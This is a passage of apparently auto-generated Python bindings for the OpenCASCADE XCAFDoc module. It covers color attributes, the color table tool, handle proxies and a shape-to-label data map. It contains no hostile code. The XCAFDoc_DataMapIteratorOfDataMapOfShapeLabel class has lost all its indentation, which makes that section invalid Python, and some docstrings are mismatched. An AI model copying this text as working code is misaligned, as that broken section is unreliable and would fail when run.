        return _XCAFDoc.XCAFDoc_Color_GetID(*args)
    GetID = staticmethod(GetID)
    def Set(self, *args):
        """
        :param label:
        :type label: TDF_Label &
        :param C:
        :type C: Quantity_Color &
        :rtype: Handle_XCAFDoc_Color
        :param label:
        :type label: TDF_Label &
        :param C:
        :type C: Quantity_NameOfColor
        :rtype: Handle_XCAFDoc_Color
        * Find, or create, a Color attribute and set it's value the Color attribute is returned.
        :param label:
        :type label: TDF_Label &
        :param R:
        :type R: float
        :param G:
        :type G: float
        :param B:
        :type B: float
        :rtype: Handle_XCAFDoc_Color
        :param C:
        :type C: Quantity_Color &
        :rtype: None
        :param C:
        :type C: Quantity_NameOfColor
        :rtype: None
        :param R:
        :type R: float
        :param G:
        :type G: float
        :param B:
        :type B: float
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_Color_Set(self, *args)
    def GetColor(self, *args):
        """
        :rtype: Quantity_Color
        """
        return _XCAFDoc.XCAFDoc_Color_GetColor(self, *args)
    def GetNOC(self, *args):
        """
        :rtype: Quantity_NameOfColor
        """
        return _XCAFDoc.XCAFDoc_Color_GetNOC(self, *args)
    def GetRGB(self, *args):
        """
        * Returns True if there is a reference on the same label
        :param R:
        :type R: float &
        :param G:
        :type G: float &
        :param B:
        :type B: float &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_Color_GetRGB(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_Color self)"""
        return _XCAFDoc.XCAFDoc_Color__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_Color self) -> Handle_XCAFDoc_Color"""
        return _XCAFDoc.XCAFDoc_Color_GetHandle(self)
    def __del__(self):
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
XCAFDoc_Color.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Color_Set,None,XCAFDoc_Color)
XCAFDoc_Color.GetColor = new_instancemethod(_XCAFDoc.XCAFDoc_Color_GetColor,None,XCAFDoc_Color)
XCAFDoc_Color.GetNOC = new_instancemethod(_XCAFDoc.XCAFDoc_Color_GetNOC,None,XCAFDoc_Color)
XCAFDoc_Color.GetRGB = new_instancemethod(_XCAFDoc.XCAFDoc_Color_GetRGB,None,XCAFDoc_Color)
XCAFDoc_Color._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Color__kill_pointed,None,XCAFDoc_Color)
XCAFDoc_Color.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Color_GetHandle,None,XCAFDoc_Color)
XCAFDoc_Color_swigregister = _XCAFDoc.XCAFDoc_Color_swigregister
XCAFDoc_Color_swigregister(XCAFDoc_Color)
def XCAFDoc_Color_GetID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.XCAFDoc_Color_GetID(*args)
class Handle_XCAFDoc_Color(OCC.TDF.Handle_TDF_Attribute):
    """Smart-pointer (handle) proxy for XCAFDoc_Color."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_Color_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Color(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Color_DownCast)
    def __del__(self):
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
Handle_XCAFDoc_Color.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Color_Nullify,None,Handle_XCAFDoc_Color)
Handle_XCAFDoc_Color.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Color_IsNull,None,Handle_XCAFDoc_Color)
Handle_XCAFDoc_Color.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Color_GetObject,None,Handle_XCAFDoc_Color)
Handle_XCAFDoc_Color._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Color__kill_pointed,None,Handle_XCAFDoc_Color)
Handle_XCAFDoc_Color_swigregister = _XCAFDoc.Handle_XCAFDoc_Color_swigregister
Handle_XCAFDoc_Color_swigregister(Handle_XCAFDoc_Color)
def Handle_XCAFDoc_Color_DownCast(*args):
    return _XCAFDoc.Handle_XCAFDoc_Color_DownCast(*args)
Handle_XCAFDoc_Color_DownCast = _XCAFDoc.Handle_XCAFDoc_Color_DownCast
class XCAFDoc_ColorTool(OCC.TDF.TDF_Attribute):
    """Tool attribute managing the colortable of an XCAF document.

    Provides add/find/remove of color definitions and assignment of colors
    (generic, surface or curve -- see XCAFDoc_ColorType) to shape labels.
    """
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_ColorTool_swiginit(self,_XCAFDoc.new_XCAFDoc_ColorTool(*args))
    def Set(*args):
        """
        * Creates (if not exist) ColorTool.
        :param L:
        :type L: TDF_Label &
        :rtype: Handle_XCAFDoc_ColorTool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_Set(*args)
    Set = staticmethod(Set)
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_ColorTool_GetID(*args)
    GetID = staticmethod(GetID)
    def BaseLabel(self, *args):
        """
        * returns the label under which colors are stored
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_ColorTool_BaseLabel(self, *args)
    def ShapeTool(self, *args):
        """
        * Returns internal XCAFDoc_ShapeTool tool
        :rtype: Handle_XCAFDoc_ShapeTool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_ShapeTool(self, *args)
    def IsColor(self, *args):
        """
        * Returns True if label belongs to a colortable and is a color definition
        :param lab:
        :type lab: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_IsColor(self, *args)
    def FindColor(self, *args):
        """
        * Finds a color definition in a colortable and returns its label if found Returns False if color is not found in colortable
        :param col:
        :type col: Quantity_Color &
        :param lab:
        :type lab: TDF_Label &
        :rtype: bool
        * Finds a color definition in a colortable and returns its label if found (or Null label else)
        :param col:
        :type col: Quantity_Color &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_ColorTool_FindColor(self, *args)
    def AddColor(self, *args):
        """
        * Adds a color definition to a colortable and returns its label (returns existing label if the same color is already defined)
        :param col:
        :type col: Quantity_Color &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_ColorTool_AddColor(self, *args)
    def RemoveColor(self, *args):
        """
        * Removes color from the colortable
        :param lab:
        :type lab: TDF_Label &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_ColorTool_RemoveColor(self, *args)
    def GetColors(self, *args):
        """
        * Returns a sequence of colors currently stored in the colortable
        :param Labels:
        :type Labels: TDF_LabelSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_ColorTool_GetColors(self, *args)
    def SetColor(self, *args):
        """
        * Sets a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color defined by <colorL>. Color of shape is defined following way in dependance with type of color. If type of color is XCAFDoc_ColorGen - then this color defines default color for surfaces and curves. If for shape color with types XCAFDoc_ColorSurf or XCAFDoc_ColorCurv is specified then such color overrides generic color.
        :param L:
        :type L: TDF_Label &
        :param colorL:
        :type colorL: TDF_Label &
        :param type:
        :type type: XCAFDoc_ColorType
        :rtype: None
        * Sets a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color <Color> in the colortable Adds a color as necessary
        :param L:
        :type L: TDF_Label &
        :param Color:
        :type Color: Quantity_Color &
        :param type:
        :type type: XCAFDoc_ColorType
        :rtype: None
        * Sets a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color defined by <colorL> Returns False if cannot find a label for shape S
        :param S:
        :type S: TopoDS_Shape &
        :param colorL:
        :type colorL: TDF_Label &
        :param type:
        :type type: XCAFDoc_ColorType
        :rtype: bool
        * Sets a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color <Color> in the colortable Adds a color as necessary Returns False if cannot find a label for shape S
        :param S:
        :type S: TopoDS_Shape &
        :param Color:
        :type Color: Quantity_Color &
        :param type:
        :type type: XCAFDoc_ColorType
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_SetColor(self, *args)
    def UnSetColor(self, *args):
        """
        * Removes a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color
        :param L:
        :type L: TDF_Label &
        :param type:
        :type type: XCAFDoc_ColorType
        :rtype: None
        * Removes a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color Returns True if such link existed
        :param S:
        :type S: TopoDS_Shape &
        :param type:
        :type type: XCAFDoc_ColorType
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_UnSetColor(self, *args)
    def IsSet(self, *args):
        """
        * Returns True if label <L> has a color assignment of the type <type>
        :param L:
        :type L: TDF_Label &
        :param type:
        :type type: XCAFDoc_ColorType
        :rtype: bool
        * Returns True if label <L> has a color assignment of the type <type>
        :param S:
        :type S: TopoDS_Shape &
        :param type:
        :type type: XCAFDoc_ColorType
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_IsSet(self, *args)
    def GetColor(self, *args):
        """
        * Returns color defined by label lab Returns False if the label is not in colortable or does not define a color
        :param lab:
        :type lab: TDF_Label &
        :param col:
        :type col: Quantity_Color &
        :rtype: bool
        * Returns label with color assigned to <L> as <type> Returns False if no such color is assigned
        :param L:
        :type L: TDF_Label &
        :param type:
        :type type: XCAFDoc_ColorType
        :param colorL:
        :type colorL: TDF_Label &
        :rtype: bool
        * Returns color assigned to <L> as <type> Returns False if no such color is assigned
        :param L:
        :type L: TDF_Label &
        :param type:
        :type type: XCAFDoc_ColorType
        :param color:
        :type color: Quantity_Color &
        :rtype: bool
        * Returns label with color assigned to <L> as <type> Returns False if no such color is assigned
        :param S:
        :type S: TopoDS_Shape &
        :param type:
        :type type: XCAFDoc_ColorType
        :param colorL:
        :type colorL: TDF_Label &
        :rtype: bool
        * Returns color assigned to <L> as <type> Returns False if no such color is assigned
        :param S:
        :type S: TopoDS_Shape &
        :param type:
        :type type: XCAFDoc_ColorType
        :param color:
        :type color: Quantity_Color &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_GetColor(self, *args)
    def IsVisible(self, *args):
        """
        * Return True if object on this label is visible, False if invisible.
        :param L:
        :type L: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_IsVisible(self, *args)
    def SetVisibility(self, *args):
        """
        * Set the visibility of object on label. Do nothing if there no any object. Set UAttribute with corresponding GUID.
        :param shapeLabel:
        :type shapeLabel: TDF_Label &
        :param isvisible: default value is Standard_True
        :type isvisible: bool
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_ColorTool_SetVisibility(self, *args)
    def SetInstanceColor(self, *args):
        """
        * Sets the color of component that styled with SHUO structure Returns False if no sush component found NOTE: create SHUO structeure if it is necessary and if <isCreateSHUO>
        :param theShape:
        :type theShape: TopoDS_Shape &
        :param type:
        :type type: XCAFDoc_ColorType
        :param color:
        :type color: Quantity_Color &
        :param isCreateSHUO: default value is Standard_True
        :type isCreateSHUO: bool
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_SetInstanceColor(self, *args)
    def GetInstanceColor(self, *args):
        """
        * Gets the color of component that styled with SHUO structure Returns False if no sush component or color type
        :param theShape:
        :type theShape: TopoDS_Shape &
        :param type:
        :type type: XCAFDoc_ColorType
        :param color:
        :type color: Quantity_Color &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_GetInstanceColor(self, *args)
    def IsInstanceVisible(self, *args):
        """
        * Gets the visibility status of component that styled with SHUO structure Returns False if no sush component
        :param theShape:
        :type theShape: TopoDS_Shape &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_IsInstanceVisible(self, *args)
    def ReverseChainsOfTreeNodes(self, *args):
        """
        * Reverses order in chains of TreeNodes (from Last to First) under each Color Label since we became to use function ::Prepend() instead of ::Append() in method SetColor() for acceleration
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ColorTool_ReverseChainsOfTreeNodes(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_ColorTool self)"""
        return _XCAFDoc.XCAFDoc_ColorTool__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_ColorTool self) -> Handle_XCAFDoc_ColorTool"""
        return _XCAFDoc.XCAFDoc_ColorTool_GetHandle(self)
    def __del__(self):
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
XCAFDoc_ColorTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_BaseLabel,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.ShapeTool = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_ShapeTool,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.IsColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_IsColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.FindColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_FindColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.AddColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_AddColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.RemoveColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_RemoveColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.GetColors = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_GetColors,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.SetColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_SetColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.UnSetColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_UnSetColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.IsSet = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_IsSet,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.GetColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_GetColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.IsVisible = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_IsVisible,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.SetVisibility = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_SetVisibility,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.SetInstanceColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_SetInstanceColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.GetInstanceColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_GetInstanceColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.IsInstanceVisible = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_IsInstanceVisible,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.ReverseChainsOfTreeNodes = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_ReverseChainsOfTreeNodes,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool__kill_pointed,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_GetHandle,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool_swigregister = _XCAFDoc.XCAFDoc_ColorTool_swigregister
XCAFDoc_ColorTool_swigregister(XCAFDoc_ColorTool)
# Free-function duplicates of the XCAFDoc_ColorTool staticmethods.
def XCAFDoc_ColorTool_Set(*args):
    """
    * Creates (if not exist) ColorTool.
    :param L:
    :type L: TDF_Label &
    :rtype: Handle_XCAFDoc_ColorTool
    """
    return _XCAFDoc.XCAFDoc_ColorTool_Set(*args)
def XCAFDoc_ColorTool_GetID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.XCAFDoc_ColorTool_GetID(*args)
class Handle_XCAFDoc_ColorTool(OCC.TDF.Handle_TDF_Attribute):
    """Smart-pointer (handle) proxy for XCAFDoc_ColorTool."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_ColorTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_ColorTool(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_ColorTool_DownCast)
    def __del__(self):
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
Handle_XCAFDoc_ColorTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ColorTool_Nullify,None,Handle_XCAFDoc_ColorTool)
Handle_XCAFDoc_ColorTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ColorTool_IsNull,None,Handle_XCAFDoc_ColorTool)
Handle_XCAFDoc_ColorTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ColorTool_GetObject,None,Handle_XCAFDoc_ColorTool)
Handle_XCAFDoc_ColorTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ColorTool__kill_pointed,None,Handle_XCAFDoc_ColorTool)
Handle_XCAFDoc_ColorTool_swigregister = _XCAFDoc.Handle_XCAFDoc_ColorTool_swigregister
Handle_XCAFDoc_ColorTool_swigregister(Handle_XCAFDoc_ColorTool)
def Handle_XCAFDoc_ColorTool_DownCast(*args):
    return _XCAFDoc.Handle_XCAFDoc_ColorTool_DownCast(*args)
Handle_XCAFDoc_ColorTool_DownCast = _XCAFDoc.Handle_XCAFDoc_ColorTool_DownCast
class XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel(OCC.TCollection.TCollection_BasicMapIterator):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
:param aMap:
:type aMap: XCAFDoc_DataMapOfShapeLabel &
:rtype: None
"""
_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_swiginit(self,_XCAFDoc.new_XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel(*args))
def Initialize(self, *args):
"""
:param aMap:
:type aMap: XCAFDoc_DataMapOfShapeLabel &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Initialize(self, *args)
def Key(self, *args):
"""
:rtype: TopoDS_Shape
"""
return _XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Key(self, *args)
def Value(self, *args):
"""
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Value(self, *args)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel.Initialize = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Initialize,None,XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel.Key = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Key,None,XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel.Value = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Value,None,XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel__kill_pointed,None,XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_swigregister = _XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_swigregister
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_swigregister(XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
class XCAFDoc_DataMapNodeOfDataMapOfShapeLabel(OCC.TCollection.TCollection_MapNode):
    """SWIG proxy: internal node of an XCAFDoc_DataMapOfShapeLabel, pairing a key with its value."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :param K:
        :type K: TopoDS_Shape &
        :param I:
        :type I: TDF_Label &
        :param n:
        :type n: TCollection_MapNodePtr &
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swiginit(self,_XCAFDoc.new_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel(*args))
    def Key(self, *args):
        """
        :rtype: TopoDS_Shape
        """
        return _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Key(self, *args)
    def Value(self, *args):
        """
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Value(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_DataMapNodeOfDataMapOfShapeLabel self)"""
        return _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_DataMapNodeOfDataMapOfShapeLabel self) -> Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel"""
        return _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_GetHandle(self)
    def __del__(self):
        # Delayed destruction via the shared GarbageCollector; swallow all
        # errors so teardown during interpreter shutdown never raises.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Bind the flat C wrapper functions as instance methods and register the class.
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.Key = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Key,None,XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.Value = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Value,None,XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel__kill_pointed,None,XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_GetHandle,None,XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister = _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister(XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
class Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel(OCC.TCollection.Handle_TCollection_MapNode):
    """SWIG proxy for the OCCT reference-counted handle to XCAFDoc_DataMapNodeOfDataMapOfShapeLabel."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast)
    def __del__(self):
        # Delayed destruction; errors during interpreter shutdown are ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Inherited handle operations bound from the flat C wrappers, then class registration.
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Nullify,None,Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_IsNull,None,Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_GetObject,None,Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel__kill_pointed,None,Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister = _XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister(Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
# Generated quirk: the def below is immediately shadowed by the direct binding
# to the C function on the following line; only the binding survives.
def Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast(*args):
  return _XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast(*args)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast = _XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast
class XCAFDoc_DataMapOfShapeLabel(OCC.TCollection.TCollection_BasicMap):
    """SWIG proxy: hashed data map from TopoDS_Shape keys to TDF_Label values."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :param NbBuckets: default value is 1
        :type NbBuckets: int
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_swiginit(self,_XCAFDoc.new_XCAFDoc_DataMapOfShapeLabel(*args))
    def Assign(self, *args):
        """
        :param Other:
        :type Other: XCAFDoc_DataMapOfShapeLabel &
        :rtype: XCAFDoc_DataMapOfShapeLabel
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Assign(self, *args)
    def Set(self, *args):
        """
        :param Other:
        :type Other: XCAFDoc_DataMapOfShapeLabel &
        :rtype: XCAFDoc_DataMapOfShapeLabel
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Set(self, *args)
    def ReSize(self, *args):
        """
        :param NbBuckets:
        :type NbBuckets: int
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ReSize(self, *args)
    def Clear(self, *args):
        """
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Clear(self, *args)
    def Bind(self, *args):
        """
        :param K:
        :type K: TopoDS_Shape &
        :param I:
        :type I: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Bind(self, *args)
    def IsBound(self, *args):
        """
        :param K:
        :type K: TopoDS_Shape &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_IsBound(self, *args)
    def UnBind(self, *args):
        """
        :param K:
        :type K: TopoDS_Shape &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_UnBind(self, *args)
    def Find(self, *args):
        """
        :param K:
        :type K: TopoDS_Shape &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Find(self, *args)
    def ChangeFind(self, *args):
        """
        :param K:
        :type K: TopoDS_Shape &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ChangeFind(self, *args)
    def Find1(self, *args):
        """
        :param K:
        :type K: TopoDS_Shape &
        :rtype: Standard_Address
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Find1(self, *args)
    def ChangeFind1(self, *args):
        """
        :param K:
        :type K: TopoDS_Shape &
        :rtype: Standard_Address
        """
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ChangeFind1(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_DataMapOfShapeLabel self)"""
        return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel__kill_pointed(self)
    def __del__(self):
        # Delayed destruction via the shared GarbageCollector; swallow all
        # errors so teardown during interpreter shutdown never raises.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Bind the flat C wrapper functions as instance methods and register the class.
XCAFDoc_DataMapOfShapeLabel.Assign = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Assign,None,XCAFDoc_DataMapOfShapeLabel)
